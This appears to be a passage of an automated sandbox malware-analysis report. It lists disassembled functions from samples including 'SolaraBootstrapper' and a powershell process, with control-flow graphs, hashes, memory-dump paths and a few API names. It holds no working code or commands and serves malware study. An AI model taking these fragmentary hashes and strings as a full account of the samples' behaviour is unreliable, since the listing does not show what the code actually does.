                          • Instruction ID: 915970d7f8feda4f52418ac8c3b3d67a18a16e2b2df1165333ea2636041f6ec6
                          • Opcode Fuzzy Hash: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                          • Instruction Fuzzy Hash: 888101F1E001149BDB54DBACDC45B9E77A9EB48309F040579F109FB392E63DAE448B68
                          Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                          APIs
                          Strings
                          • />pj)w^wi!p&370^jskbtm-=lzrjeh2*, xrefs: 0040106E
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: />pj)w^wi!p&370^jskbtm-=lzrjeh2*
                          • API String ID: 2803490479-4076278676
                          • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                          • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                          • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                          • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                          Function 0040145B Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 34 40145b-4014ae call 4013b4 call 40108c call 401410
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: memset$ExecuteShellstrcmp
                          • String ID: D`:vD`:v$D`:vD`:v
                          • API String ID: 1389483452-3916433284
                          • Opcode ID: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                          • Instruction ID: 76c1b6daecc4063cf20948b66e9e7b3ce613b504874fb2aeec9fcfb98b4de26b
                          • Opcode Fuzzy Hash: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                          • Instruction Fuzzy Hash: 9AF09E75A00208AFCB40EFADD981D8A77F8AB4C304F1044A5FD48E7351D674E9848B55

                          Executed Functions

                          Function 02700890 Relevance: .4, Instructions: 372COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67ecd6166a9c2d86ff6a8307bf700f36a1dcb633405764076fb9dc0d3fd9fda1
                          • Instruction ID: e779ff57d77114946edc198d05eefae62c9cf5dcc6c790a1345301bfa5cdd019
                          • Opcode Fuzzy Hash: 67ecd6166a9c2d86ff6a8307bf700f36a1dcb633405764076fb9dc0d3fd9fda1
                          • Instruction Fuzzy Hash: 9AF10674D01629CFDB28EF65D984B9DBBB2BB8A310F1095E9D409B7294DB305E85CF04
                          Function 02700880 Relevance: .3, Instructions: 340COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a85a95a09aeefa2d316109b081b273d4f3cd3d63712e006fa548adca29fdea0
                          • Instruction ID: d5c4b252ab6a9e6898d8cf5272b382f5935048d27177dc616b28adad2fe45f1a
                          • Opcode Fuzzy Hash: 1a85a95a09aeefa2d316109b081b273d4f3cd3d63712e006fa548adca29fdea0
                          • Instruction Fuzzy Hash: 44E11874D00629CFDB28EF65D984BDDBBB2BB89310F1095E98449B72A4DB305E85CF04
                          Function 0270246D Relevance: .4, Instructions: 353COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fad053a24ab4e3fd2513f58c0b477d4156fa8eb4c420efa62580ca4ce838eca9
                          • Instruction ID: d1c143b84ef8b07c9bbcb72d14d34774786e44c699c5f722f26ec0e32ad22942
                          • Opcode Fuzzy Hash: fad053a24ab4e3fd2513f58c0b477d4156fa8eb4c420efa62580ca4ce838eca9
                          • Instruction Fuzzy Hash: A1018B74D09784DFDB16DFB8E48559DBFF0AF4A200B1488EAC84597262E374A919CF01
                          Function 02701050 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ca396318575f9737b4fb590426172653f33866ee9dcf06407e3143ae7647333
                          • Instruction ID: 647694b59d4d25a38e75d7a0ceef9f6d8b4e1979a3866f5de1800e86898f2eab
                          • Opcode Fuzzy Hash: 9ca396318575f9737b4fb590426172653f33866ee9dcf06407e3143ae7647333
                          • Instruction Fuzzy Hash: 57412370E01608DFDB69DFA9D894AAEBBF2BF89310F108429D855B7394DB70584ACF40
                          Function 0270275B Relevance: .1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dab259a8a693b86a6b5c1094ffd8de1ac7b2091fd2822512b798d1c9e31400b0
                          • Instruction ID: 7776d5213fd7f4529d4c28f0e900bf5543d5e00320243bdec143f261dd421f96
                          • Opcode Fuzzy Hash: dab259a8a693b86a6b5c1094ffd8de1ac7b2091fd2822512b798d1c9e31400b0
                          • Instruction Fuzzy Hash: 5D21F575D01208DFDB19DFA4D599ADEBBF2AF89300F209469D802B72A1CB315D09CB54
                          Function 02702768 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d740ef49dc0fda5b861d7b76089a66f3f27bb7db6331867f1d7cefb7f5021cc3
                          • Instruction ID: 898e89cd5079c8141a5378c2c03af7e07acc19a225e4b53675dce04416973ac2
                          • Opcode Fuzzy Hash: d740ef49dc0fda5b861d7b76089a66f3f27bb7db6331867f1d7cefb7f5021cc3
                          • Instruction Fuzzy Hash: 4C21F475E01208CFDB19DFA5D598ADEBBF2AB89300F209469D801B73A1DB315D08CBA4
                          Function 02700FC8 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69ec557d4dc74be7449d195839311528f00b504d5617017143492e365bcdd9c4
                          • Instruction ID: 5cf53b8257ffdbdeb99d4d0c85cfeca2c95aeb5125ffe8049f8152119de5f08f
                          • Opcode Fuzzy Hash: 69ec557d4dc74be7449d195839311528f00b504d5617017143492e365bcdd9c4
                          • Instruction Fuzzy Hash: 0BF0ED70985284DFC702DF78F958AED3BB5AB82304F8405E9D4409B262EB305E18EB14
                          Function 02700FD8 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15c93cd90aeeec8e0915a710a046438c5a96c0306ca652483550691cc225bcf5
                          • Instruction ID: 56d4c687b2101dc4539836595246e7c00611ddc6d9b46c109585b0fa5a67a857
                          • Opcode Fuzzy Hash: 15c93cd90aeeec8e0915a710a046438c5a96c0306ca652483550691cc225bcf5
                          • Instruction Fuzzy Hash: 1EE04F70981208EFC701EFB8E509A9D77F9EB41314F8045A8D80497250EB716E18EB44

                          Execution Graph

                          Execution Coverage:6.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 20973 8647160 20974 86471a3 SetThreadToken 20973->20974 20975 86471d1 20974->20975

                          Executed Functions

                          Function 049AB570 Relevance: .3, Instructions: 258COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 49ab570-49ab599 661 49ab59b 660->661 662 49ab59e-49ab8d9 call 49aab94 660->662 661->662 723 49ab8de-49ab8e5 662->723
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc61222dc4764fe5e61951612073b7afb1d95bc1487d8d67e9807e6588f50ab2
                          • Instruction ID: d84e531370e5abce7c3c7414d2f60a3cd5aacdadbefe9a654bd354c3382767d6
                          • Opcode Fuzzy Hash: cc61222dc4764fe5e61951612073b7afb1d95bc1487d8d67e9807e6588f50ab2
                          • Instruction Fuzzy Hash: E3915170B007145BEB59EFB489109AEB7E3EFC4600B00C92DD506AB398DF75AE098BD5
                          Function 049AB580 Relevance: .3, Instructions: 252COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 724 49ab580-49ab599 725 49ab59b 724->725 726 49ab59e-49ab8d9 call 49aab94 724->726 725->726 787 49ab8de-49ab8e5 726->787
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5b03407574271ce5fa1f59e797039915a3512e860376d716df525de4d981ecf
                          • Instruction ID: 2abf3a8668287fdd1c37a893e609f8264bf9dc052c35b5c9ba8c8a83ce39df7d
                          • Opcode Fuzzy Hash: e5b03407574271ce5fa1f59e797039915a3512e860376d716df525de4d981ecf
                          • Instruction Fuzzy Hash: 46916070B007145BEB59EFB489106AEB7E7EFC4600B00C92DD506AB398DF75AE098BD5
                          Function 07352308 Relevance: 13.1, Strings: 10, Instructions: 646COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$JPl$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-3034988559
                          • Opcode ID: 7894ff360d8a9937fc647ae1f7fedc81f6fad6211e18dd315935e1c38a22fd6c
                          • Instruction ID: 8d4d34e984c0912cc9cbe35dba6ce2338a99c6050c97a6203135e9856fdf15c5
                          • Opcode Fuzzy Hash: 7894ff360d8a9937fc647ae1f7fedc81f6fad6211e18dd315935e1c38a22fd6c
                          • Instruction Fuzzy Hash: A72215F1B002059FEB21DB68C941EABBBE6FF85211F04807AEC19CB651DB35D945C7A2
                          Function 07353CE8 Relevance: 5.6, Strings: 4, Instructions: 575COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 7353ce8-7353d0d 206 7353f00-7353f4a 205->206 207 7353d13-7353d18 205->207 217 7353f50-7353f55 206->217 218 73540ce-7354112 206->218 208 7353d30-7353d34 207->208 209 7353d1a-7353d20 207->209 210 7353eb0-7353eba 208->210 211 7353d3a-7353d3c 208->211 213 7353d24-7353d2e 209->213 214 7353d22 209->214 219 7353ebc-7353ec5 210->219 220 7353ec8-7353ece 210->220 215 7353d4c 211->215 216 7353d3e-7353d4a 211->216 213->208 214->208 224 7353d4e-7353d50 215->224 216->224 225 7353f57-7353f5d 217->225 226 7353f6d-7353f71 217->226 234 7354228-735425d 218->234 235 7354118-735411d 218->235 222 7353ed4-7353ee0 220->222 223 7353ed0-7353ed2 220->223 228 7353ee2-7353efd 222->228 223->228 224->210 231 7353d56-7353d75 224->231 232 7353f61-7353f6b 225->232 233 7353f5f 225->233 229 7353f77-7353f79 226->229 230 7354080-735408a 226->230 237 7353f89 229->237 238 7353f7b-7353f87 229->238 239 7354097-735409d 230->239 240 735408c-7354094 230->240 270 7353d85 231->270 271 7353d77-7353d83 231->271 232->226 233->226 260 735425f-7354281 234->260 261 735428b-7354295 234->261 242 7354135-7354139 235->242 243 735411f-7354125 235->243 244 7353f8b-7353f8d 237->244 238->244 245 73540a3-73540af 239->245 246 735409f-73540a1 239->246 253 735413f-7354141 242->253 254 73541da-73541e4 242->254 249 7354127 243->249 250 7354129-7354133 243->250 244->230 251 7353f93-7353fb2 244->251 252 73540b1-73540cb 245->252 246->252 249->242 250->242 296 7353fb4-7353fc0 251->296 297 7353fc2 251->297 258 7354151 253->258 259 7354143-735414f 253->259 263 73541e6-73541ee 254->263 264 73541f1-73541f7 254->264 269 7354153-7354155 258->269 259->269 302 73542d5-73542fe 260->302 303 7354283-7354288 260->303 265 7354297-735429c 261->265 266 735429f-73542a5 261->266 273 73541fd-7354209 264->273 274 73541f9-73541fb 264->274 276 73542a7-73542a9 266->276 277 73542ab-73542b7 266->277 269->254 280 735415b-735415d 269->280 279 7353d87-7353d89 270->279 271->279 275 735420b-7354225 273->275 274->275 282 73542b9-73542d2 276->282 277->282 279->210 284 7353d8f-7353d96 279->284 285 7354177-735417e 280->285 286 735415f-7354165 280->286 284->206 288 7353d9c-7353da1 284->288 292 7354196-73541d7 285->292 293 7354180-7354186 285->293 289 7354167 286->289 290 7354169-7354175 286->290 298 7353da3-7353da9 288->298 299 7353db9-7353dc8 288->299 289->285 290->285 300 7354188 293->300 301 735418a-7354194 293->301 306 7353fc4-7353fc6 296->306 297->306 308 7353dad-7353db7 298->308 309 7353dab 298->309 299->210 318 7353dce-7353dec 299->318 300->292 301->292 320 7354300-7354326 302->320 321 735432d-7354335 302->321 306->230 307 7353fcc-7354003 306->307 328 7354005-735400b 307->328 329 735401d-7354024 307->329 308->299 309->299 318->210 332 7353df2-7353e17 318->332 320->321 330 7354337-7354345 321->330 331 7354346-7354348 321->331 334 735400d 328->334 335 735400f-735401b 328->335 336 7354026-735402c 329->336 337 735403c-735407d 329->337 330->331 338 7354354-735435c 331->338 339 735434a-7354353 331->339 332->210 354 7353e1d-7353e24 332->354 334->329 335->329 344 7354030-735403a 336->344 345 735402e 336->345 342 7354395-735439f 338->342 343 735435e-735437b 338->343 339->338 346 73543a1-73543a5 342->346 347 73543a8-73543ae 342->347 356 73543e5-73543ea 343->356 357 735437d-735438f 343->357 344->337 345->337 351 73543b4-73543c0 347->351 352 73543b0-73543b2 347->352 355 73543c2-73543e2 351->355 352->355 358 7353e26-7353e41 354->358 359 7353e6a-7353e9d 354->359 356->357 357->342 365 7353e43-7353e49 358->365 366 7353e5b-7353e5f 358->366 374 7353ea4-7353ead 359->374 369 7353e4d-7353e59 365->369 370 7353e4b 365->370 371 7353e66-7353e68 366->371 369->366 370->366 371->374
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$4'jq
                          • API String ID: 0-4000621977
                          • Opcode ID: cf5163ae5796f87ff726e3bbcec72b0ca4dff86f88f072289fec2ce50f125772
                          • Instruction ID: c0cf01dde95228cec3466cfca87847e6099ba4ffa330541807ec5d1e2c5cd423
                          • Opcode Fuzzy Hash: cf5163ae5796f87ff726e3bbcec72b0ca4dff86f88f072289fec2ce50f125772
                          • Instruction Fuzzy Hash: F21277B17042558FEB158B68C811F6BBBA6AFC1354F14847ADD09CF291DB36CD82C7A2
                          Function 0864715A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 378 864715a-864719b 379 86471a3-86471cf SetThreadToken 378->379 380 86471d1-86471d7 379->380 381 86471d8-86471f5 379->381 380->381
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.2261989415.0000000008640000.00000040.00000800.00020000.00000000.sdmp, Offset: 08640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_8640000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: 88b40d71964e8e670a0727a581e476812fbab970fce86ed5fa3832f783f395d5
                          • Instruction ID: 2ccd70d5912830cbccf1075263d08cfbf03096e4b2a80b862e031f41e7a0b9d6
                          • Opcode Fuzzy Hash: 88b40d71964e8e670a0727a581e476812fbab970fce86ed5fa3832f783f395d5
                          • Instruction Fuzzy Hash: 6B1113B59002488FCB10DFAAD985AEEFFF4EF89320F248459D519A7250C778A945CFA0
                          Function 08647160 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 384 8647160-86471cf SetThreadToken 386 86471d1-86471d7 384->386 387 86471d8-86471f5 384->387 386->387
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.2261989415.0000000008640000.00000040.00000800.00020000.00000000.sdmp, Offset: 08640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_8640000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: dbadf66976a844ec429665c3fa1cd7b9147d2004c6a9d15fd06e22796e08838f
                          • Instruction ID: f57d5296b2ed2d07073b42d94968752592605eebfe2221c34550193405ddd7ee
                          • Opcode Fuzzy Hash: dbadf66976a844ec429665c3fa1cd7b9147d2004c6a9d15fd06e22796e08838f
                          • Instruction Fuzzy Hash: E211F2B59002488FCB10DF9AD984B9EFBF8EF49320F24846AD519A7350C778A945CFA5
                          Function 049A70A8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 390 49a70a8-49a70c7 391 49a71cd-49a720b 390->391 392 49a70cd-49a70d0 390->392 422 49a70d2 call 49a775f 392->422 423 49a70d2 call 49a7744 392->423 394 49a70d8-49a70ea 397 49a70ec-49a70f4 394->397 398 49a70f6-49a710b 394->398 397->398 405 49a7111-49a7121 398->405 406 49a7196-49a71af 398->406 408 49a712d-49a7138 405->408 409 49a7123 405->409 411 49a71ba-49a71bb 406->411 412 49a71b1 406->412 424 49a713b call 49ac010 408->424 425 49a713b call 49ac000 408->425 409->408 411->391 412->411 415 49a7141-49a7145 416 49a7147-49a7157 415->416 417 49a7185-49a7190 415->417 418 49a7159-49a7171 416->418 419 49a7173-49a717d 416->419 417->405 417->406 418->417 419->417 422->394 423->394 424->415 425->415
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: dacd9e27d2e11d39bb60dcf29c5d1c3955cfd455c1a77fe276bee5204099d8dc
                          • Instruction ID: 52a7b424f6f9692307346012bffded72be5dadb83d7fb11958d5209404665708
                          • Opcode Fuzzy Hash: dacd9e27d2e11d39bb60dcf29c5d1c3955cfd455c1a77fe276bee5204099d8dc
                          • Instruction Fuzzy Hash: DC414134B042448FDB14DFA8C499AADBBF6EF8D315F1444A9D806AB391DB35EC01CBA1
                          Function 049AB088 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 426 49ab088-49ab091 call 49aa87c 428 49ab096-49ab09a 426->428 429 49ab0aa-49ab145 428->429 430 49ab09c-49ab0a9 428->430 436 49ab14e-49ab16b 429->436 437 49ab147-49ab14d 429->437 437->436
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (&jq
                          • API String ID: 0-3222446104
                          • Opcode ID: c685b31134793de7aa71479855ff3da2e7aee117ab9ba68511d458d4adeee6dd
                          • Instruction ID: 83567b770667aec62d4321942af1f2ca34d0ad1e89d2d0a4a2554b304cb38d9d
                          • Opcode Fuzzy Hash: c685b31134793de7aa71479855ff3da2e7aee117ab9ba68511d458d4adeee6dd
                          • Instruction Fuzzy Hash: DF21AE71A042588FCB14DFAED844BAEBFF5EB89320F14846AD519A7340CA74A905CBE5
                          Function 049A29F0 Relevance: .2, Instructions: 214COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 788 49a29f0-49a2a1e 789 49a2a24-49a2a3a 788->789 790 49a2af5-49a2b37 788->790 791 49a2a3f-49a2a52 789->791 792 49a2a3c 789->792 795 49a2b3d-49a2b56 790->795 796 49a2c51-49a2c67 790->796 791->790 797 49a2a58-49a2a65 791->797 792->791 798 49a2b5b-49a2b69 795->798 799 49a2b58 795->799 800 49a2a6a-49a2a7c 797->800 801 49a2a67 797->801 798->796 806 49a2b6f-49a2b79 798->806 799->798 800->790 809 49a2a7e-49a2a88 800->809 801->800 807 49a2b7b-49a2b7d 806->807 808 49a2b87-49a2b94 806->808 807->808 808->796 810 49a2b9a-49a2baa 808->810 811 49a2a8a-49a2a8c 809->811 812 49a2a96-49a2aa6 809->812 813 49a2baf-49a2bbd 810->813 814 49a2bac 810->814 811->812 812->790 815 49a2aa8-49a2ab2 812->815 813->796 820 49a2bc3-49a2bd3 813->820 814->813 816 49a2ac0-49a2af4 815->816 817 49a2ab4-49a2ab6 815->817 817->816 821 49a2bd8-49a2be5 820->821 822 49a2bd5 820->822 821->796 825 49a2be7-49a2bf7 821->825 822->821 826 49a2bf9 825->826 827 49a2bfc-49a2c08 825->827 826->827 827->796 829 49a2c0a-49a2c24 827->829 830 49a2c29 829->830 831 49a2c26 829->831 832 49a2c2e-49a2c38 830->832 831->830 833 49a2c3d-49a2c50 832->833
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b91ef4dbd1f8b597163333607dbf91060e0a50211564667a666dddcb1005f0d
                          • Instruction ID: f2f497997a85dd56b124a09804ea23c2892f14204fa4cfe4d30ba4af6688120b
                          • Opcode Fuzzy Hash: 3b91ef4dbd1f8b597163333607dbf91060e0a50211564667a666dddcb1005f0d
                          • Instruction Fuzzy Hash: A4919974A006099FCB15CF58C5949BEFBB1FF89310B2486A9D815AB3A5C735FC91CBA0
                          Function 049ABBB0 Relevance: .2, Instructions: 155COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 968 49abbb0-49abc40 972 49abc42 968->972 973 49abc46-49abc51 968->973 972->973 974 49abc53 973->974 975 49abc56-49abcb0 call 49ab088 973->975 974->975 982 49abcb2-49abcb7 975->982 983 49abd01-49abd05 975->983 982->983 984 49abcb9-49abcdc 982->984 985 49abd16 983->985 986 49abd07-49abd11 983->986 990 49abce2-49abced 984->990 987 49abd1b-49abd1d 985->987 986->985 988 49abd1f-49abd40 987->988 989 49abd42-49abd45 call 49aa870 987->989 995 49abd4a-49abd4e 988->995 989->995 992 49abcef-49abcf5 990->992 993 49abcf6-49abcff 990->993 992->993 993->987 996 49abd50-49abd79 995->996 997 49abd87-49abdb6 995->997 996->997
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 491f47f41062809d5a9e990db4714adf35351f007c38dad30df171136425cc07
                          • Instruction ID: 3762bfaafe3656f935a4a28a2ba69cb2ad977a59b55265c208eb8dd4e91ec9bf
                          • Opcode Fuzzy Hash: 491f47f41062809d5a9e990db4714adf35351f007c38dad30df171136425cc07
                          • Instruction Fuzzy Hash: EF612771E003489FDB14DFA9D984A9DBBF6FF88310F148129E918AB354EB35AC45CB90
                          Function 049A7808 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1007 49a7808-49a783e 1010 49a7840-49a7842 1007->1010 1011 49a7847-49a7850 1007->1011 1012 49a78f1-49a78f6 1010->1012 1014 49a7859-49a7877 1011->1014 1015 49a7852-49a7854 1011->1015 1018 49a7879-49a787b 1014->1018 1019 49a787d-49a7881 1014->1019 1015->1012 1018->1012 1020 49a7883-49a7888 1019->1020 1021 49a7890-49a7897 1019->1021 1020->1021 1022 49a7899-49a78c2 1021->1022 1023 49a78f7-49a7928 1021->1023 1026 49a78d0 1022->1026 1027 49a78c4-49a78ce 1022->1027 1033 49a79aa-49a79ae 1023->1033 1034 49a792e-49a7985 1023->1034 1029 49a78d2-49a78de 1026->1029 1027->1029 1035 49a78e0-49a78e2 1029->1035 1036 49a78e4-49a78eb 1029->1036 1047 49a79b1 call 49a7a08 1033->1047 1048 49a79b1 call 49a7a00 1033->1048 1043 49a7991-49a799f 1034->1043 1044 49a7987 1034->1044 1035->1012 1036->1012 1038 49a79b4-49a79b9 1043->1033 1046 49a79a1-49a79a9 1043->1046 1044->1043 1047->1038 1048->1038
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f475816ddc9a0515554948b22d338d9490c329db8e286a3e8a7f70c755aab4c6
                          • Instruction ID: 0bd6acd00e05bbd0632fc5cbaa3e41a8c66e20f4f38d75d510eccb128a5d8699
                          • Opcode Fuzzy Hash: f475816ddc9a0515554948b22d338d9490c329db8e286a3e8a7f70c755aab4c6
